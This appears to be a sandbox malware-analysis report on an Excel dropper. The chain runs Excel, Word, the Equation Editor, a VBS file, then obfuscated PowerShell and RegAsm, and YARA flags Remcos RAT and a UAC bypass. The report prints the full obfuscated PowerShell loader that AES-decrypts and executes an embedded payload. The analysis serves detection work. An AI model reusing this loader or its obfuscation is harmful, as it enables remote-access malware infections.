            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@9/31@8/6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00417952
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040F474
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041B4A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AA4A
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\90530000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-999Z97
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR87D4.tmpJump to behavior
            Source: AWD 490104998518.xlsOLE indicator, Workbook stream: true
            Source: 90530000.0.drOLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................J..............................................T..........s............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................J......................................................................Jump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: AWD 490104998518.xlsReversingLabs: Detection: 28%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
